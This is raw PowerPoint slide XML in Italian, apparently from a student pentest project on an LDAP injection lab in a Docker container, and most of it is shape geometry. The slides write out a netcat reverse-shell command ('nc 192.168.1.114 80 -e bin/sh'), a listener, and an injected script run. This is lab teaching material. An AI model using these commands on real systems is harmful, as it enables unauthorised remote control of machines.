            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>avviera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> l’esecuzione di codice arbitraria in quanto avvierà la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.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5404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DCD98924-797A-B637-BFE3-2F689AC35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858" y="974043"/>
            <a:ext cx="6767146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588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724875C-9819-C1CE-649F-D9FB86A38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Verifica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7515FB9-FE7B-5BA6-D206-4DE3288B58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 fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Per verificare se il test è andato a buon fine basta verificare che la risposta al servizio sia di tipo 200.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Un ulteriore verifica che possiamo fare sul nostro lab è verificare se il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> nella cartella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>temp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> si sia creato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Utilizzeremo due comandi , uno per verificare l’id del container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> –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idcontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> /bin/sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15520644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950AD4C-6AF3-49F8-94E1-DBCAFB394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5AB8F98-27E9-490A-9FFC-6FB07CEAB2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4762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BB673AF-CE4B-46CB-AF61-47A2F6B51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922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B244C92-C225-4ED6-9477-FE38CFE28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6194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3B79606-5986-49BA-9D40-A0FD94094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76187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534AD34-A74F-4FCD-8E77-6A38F9263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6083" y="0"/>
            <a:ext cx="9841377" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1623023 w 9841377"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 4289416 w 9841377"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4359035 w 9841377"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5482342 w 9841377"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 5551962 w 9841377"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 8218354 w 9841377"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 8240478 w 9841377"/>
              <a:gd name="connsiteY6" fmla="*/ 14997 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 9841377 w 9841377"/>
              <a:gd name="connsiteY7" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 7967027 w 9841377"/>
              <a:gd name="connsiteY8" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 7450379 w 9841377"/>
              <a:gd name="connsiteY9" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 7338623 w 9841377"/>
              <a:gd name="connsiteY10" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 5551962 w 9841377"/>
              <a:gd name="connsiteY11" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 5482342 w 9841377"/>
              <a:gd name="connsiteY12" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 4359035 w 9841377"/>
              <a:gd name="connsiteY13" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 4289416 w 9841377"/>
              <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 2502754 w 9841377"/>
              <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 2390998 w 9841377"/>
              <a:gd name="connsiteY16" fmla="*/ 6780599 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 1874350 w 9841377"/>
              <a:gd name="connsiteY17" fmla="*/ 6374814 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 0 w 9841377"/>
              <a:gd name="connsiteY18" fmla="*/ 3621656 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 1600899 w 9841377"/>
              <a:gd name="connsiteY19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9841377" h="6858000">
                <a:moveTo>
                  <a:pt x="1623023" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4289416" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4359035" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5482342" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5551962" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8218354" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8240478" y="14997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9267641" y="754641"/>
                  <a:pt x="9841377" y="2093192"/>
                  <a:pt x="9841377" y="3621656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9841377" y="4969131"/>
                  <a:pt x="8912652" y="5602839"/>
                  <a:pt x="7967027" y="6374814"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7794824" y="6515397"/>
                  <a:pt x="7624197" y="6653108"/>
                  <a:pt x="7450379" y="6780599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7338623" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5551962" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5482342" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4359035" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="428941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8C0466A1-0EC4-02D2-7771-E677F3755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62" y="1724064"/>
            <a:ext cx="7621040" cy="296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46006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18182EDE-1864-9CA7-BC37-C6ED78AC7B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Reverse shell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85114F9-F550-40AD-5BA4-0DA1C6FA6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 fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Tra i vari comandi imposto uno di reverse shell per ottenere il controllo della macchina. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>In particolare iniettando il comando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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mi accorgo che è installato su alpine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Al fine di evitare errori sintattici dovuti alla sintassi della query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> creo uno script sh chiamato example.sh contenente i comandi da eseguire all’occorrenza.</a:t>
            </a:r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523765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FCCBE988-CD88-C59A-BADB-29A0F84B2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sz="2800" dirty="0"/>
              <a:t>Reverse shell </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="30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55EC1E7-DBF4-7DA5-644F-5231EB4684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rmAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>redirecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> dell’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ouput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> eseguo questo comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 192.168.1.114 80 –e bin/sh &gt; example.sh &amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> +x example.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Dove il secondo comando rende </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>esegubile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> lo script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Dopodichè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mi metto in ascolto sulla porta 80 tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>modalita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> verbosa con il comando </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Eseguo lo script iniettando il comando </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>sh example.sh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36567137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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="2022-08-31 19-40-21">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A2C6C33-4F1E-40D8-4035-ADCD2EF79C9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309" y="18264"/>
            <a:ext cx="12161228" cy="6839736"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89742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1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3B4D24-F4A8-4141-A20A-E0575D199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CEEF8A-4A3A-4B35-AA57-D804767F5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" y="0"/>
            <a:ext cx="12191696" cy="6170490"/>
            <a:chOff x="-2" y="0"/>
            <a:chExt cx="12191696" cy="617049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5A741C2-AB82-4BF5-9324-5D0B56A3D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3167675" y="-3167677"/>
              <a:ext cx="5856341" cy="12191695"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5856341"/>
                <a:gd name="connsiteY0" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 5856341"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX2" fmla="*/ 243849 w 5856341"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX3" fmla="*/ 505121 w 5856341"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX4" fmla="*/ 723207 w 5856341"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX5" fmla="*/ 755828 w 5856341"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX6" fmla="*/ 1411868 w 5856341"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX7" fmla="*/ 1421034 w 5856341"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX8" fmla="*/ 1515206 w 5856341"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX9" fmla="*/ 2636151 w 5856341"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX10" fmla="*/ 4637890 w 5856341"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 12191695"/>
                <a:gd name="connsiteX11" fmla="*/ 4654499 w 5856341"/>
                <a:gd name="connsiteY11" fmla="*/ 26661 h 12191695"/>
                <a:gd name="connsiteX12" fmla="*/ 5856341 w 5856341"/>
                <a:gd name="connsiteY12" fmla="*/ 6438338 h 12191695"/>
                <a:gd name="connsiteX13" fmla="*/ 4449211 w 5856341"/>
                <a:gd name="connsiteY13" fmla="*/ 11332719 h 12191695"/>
                <a:gd name="connsiteX14" fmla="*/ 4061349 w 5856341"/>
                <a:gd name="connsiteY14" fmla="*/ 12054097 h 12191695"/>
                <a:gd name="connsiteX15" fmla="*/ 3977450 w 5856341"/>
                <a:gd name="connsiteY15" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX16" fmla="*/ 2636151 w 5856341"/>
                <a:gd name="connsiteY16" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX17" fmla="*/ 1421034 w 5856341"/>
                <a:gd name="connsiteY17" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX18" fmla="*/ 1411868 w 5856341"/>
                <a:gd name="connsiteY18" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX19" fmla="*/ 1283685 w 5856341"/>
                <a:gd name="connsiteY19" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX20" fmla="*/ 755828 w 5856341"/>
                <a:gd name="connsiteY20" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX21" fmla="*/ 723207 w 5856341"/>
                <a:gd name="connsiteY21" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX22" fmla="*/ 505121 w 5856341"/>
                <a:gd name="connsiteY22" fmla="*/ 12191695 h 12191695"/>
                <a:gd name="connsiteX23" fmla="*/ 243849 w 5856341"/>
                <a:gd name="connsiteY23" fmla="*/ 12191695 h 1219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856341" h="12191695">
                  <a:moveTo>
                    <a:pt x="0" y="12191695"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243849" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505121" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723207" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755828" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1411868" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421034" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515206" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636151" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4637890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4654499" y="26661"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5425621" y="1341551"/>
                    <a:pt x="5856341" y="3721137"/>
                    <a:pt x="5856341" y="6438338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5856341" y="8833790"/>
                    <a:pt x="5159120" y="9960353"/>
                    <a:pt x="4449211" y="11332719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4319934" y="11582638"/>
                    <a:pt x="4191839" y="11827452"/>
                    <a:pt x="4061349" y="12054097"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3977450" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2636151" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421034" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1411868" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283685" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="755828" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723207" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505121" y="12191695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243849" y="12191695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46807-BF17-4E5D-90A8-A062604C0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6277" y="-874927"/>
              <a:ext cx="1899138" cy="12191695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23926DB-76C8-474A-B5FB-F43C59E33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143758" y="-1037574"/>
              <a:ext cx="1904176" cy="12191695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C1F5347-E00A-4E12-AC11-18E0B1AF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5247015" y="-1314429"/>
              <a:ext cx="1697663" cy="12191695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55CD927B-3B96-D3B4-4079-2DC7660CC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 err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Testing Report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39D117-14FC-D47D-A32C-D650B948A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107096"/>
            <a:ext cx="8391967" cy="2846567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it-IT" dirty="0"/>
              <a:t>Il report in merito all’attività di testing eseguita lo si può trovare al seguente link (o nella directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0"/>
              <a:t>https://github.com/mariogiordano96/progetto-pentest/blob/master/progetto-pentest-mg/Pentest_Report.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3070356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51A08AC-F796-409C-AD97-8B476289E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E1B312B-4E9A-405C-9CE8-103254380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0"/>
            <a:ext cx="10853745" cy="6858000"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="10934058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27ED404-4912-4C80-B5EB-98E67EB2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" y="0"/>
              <a:ext cx="10515600" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 10515600"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 3039549 w 10515600"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 3387573 w 10515600"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 3678072 w 10515600"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 3721524 w 10515600"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX5" fmla="*/ 4595394 w 10515600"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX6" fmla="*/ 4607603 w 10515600"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX7" fmla="*/ 4733044 w 10515600"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX8" fmla="*/ 6226185 w 10515600"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX9" fmla="*/ 8892577 w 10515600"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX10" fmla="*/ 8914701 w 10515600"/>
                <a:gd name="connsiteY10" fmla="*/ 14997 h 6858000"/>
                <a:gd name="connsiteX11" fmla="*/ 10515600 w 10515600"/>
                <a:gd name="connsiteY11" fmla="*/ 3621656 h 6858000"/>
                <a:gd name="connsiteX12" fmla="*/ 8641250 w 10515600"/>
                <a:gd name="connsiteY12" fmla="*/ 6374814 h 6858000"/>
                <a:gd name="connsiteX13" fmla="*/ 8124602 w 10515600"/>
                <a:gd name="connsiteY13" fmla="*/ 6780599 h 6858000"/>
                <a:gd name="connsiteX14" fmla="*/ 8012846 w 10515600"/>
                <a:gd name="connsiteY14" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX15" fmla="*/ 6226185 w 10515600"/>
                <a:gd name="connsiteY15" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX16" fmla="*/ 4607603 w 10515600"/>
                <a:gd name="connsiteY16" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX17" fmla="*/ 4595394 w 10515600"/>
                <a:gd name="connsiteY17" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX18" fmla="*/ 4424650 w 10515600"/>
                <a:gd name="connsiteY18" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX19" fmla="*/ 3721524 w 10515600"/>
                <a:gd name="connsiteY19" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX20" fmla="*/ 3678072 w 10515600"/>
                <a:gd name="connsiteY20" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX21" fmla="*/ 3387573 w 10515600"/>
                <a:gd name="connsiteY21" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX22" fmla="*/ 3039549 w 10515600"/>
                <a:gd name="connsiteY22" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX23" fmla="*/ 0 w 10515600"/>
                <a:gd name="connsiteY2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0515600" h="6858000">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3039549" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3387573" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678072" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721524" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4595394" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4607603" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4733044" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6226185" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8892577" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8914701" y="14997"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9941864" y="754641"/>
                    <a:pt x="10515600" y="2093192"/>
                    <a:pt x="10515600" y="3621656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10515600" y="4969131"/>
                    <a:pt x="9586875" y="5602839"/>
                    <a:pt x="8641250" y="6374814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8469047" y="6515397"/>
                    <a:pt x="8298420" y="6653108"/>
                    <a:pt x="8124602" y="6780599"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8012846" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6226185" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4607603" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4595394" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4424650" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3721524" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678072" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3387573" y="6858000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3039549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E58012C-4DA3-4ED3-9500-41F9AF60B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404334" y="0"/>
              <a:ext cx="2529723" cy="6858000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1258269 w 2529723"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX1" fmla="*/ 1275627 w 2529723"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
                <a:gd name="connsiteX2" fmla="*/ 1302560 w 2529723"/>
                <a:gd name="connsiteY2" fmla="*/ 24338 h 6858000"/>
                <a:gd name="connsiteX3" fmla="*/ 2522825 w 2529723"/>
                <a:gd name="connsiteY3" fmla="*/ 3678515 h 6858000"/>
                <a:gd name="connsiteX4" fmla="*/ 557500 w 2529723"/>
                <a:gd name="connsiteY4" fmla="*/ 6451411 h 6858000"/>
                <a:gd name="connsiteX5" fmla="*/ 32482 w 2529723"/>
                <a:gd name="connsiteY5" fmla="*/ 6849373 h 6858000"/>
                <a:gd name="connsiteX6" fmla="*/ 19531 w 2529723"/>
                <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2529723"/>
                <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
                <a:gd name="connsiteX8" fmla="*/ 14202 w 2529723"/>
                <a:gd name="connsiteY8" fmla="*/ 6848540 h 6858000"/>
                <a:gd name="connsiteX9" fmla="*/ 539221 w 2529723"/>
                <a:gd name="connsiteY9" fmla="*/ 6450578 h 6858000"/>
                <a:gd name="connsiteX10" fmla="*/ 2504546 w 2529723"/>
                <a:gd name="connsiteY10" fmla="*/ 3677682 h 6858000"/>
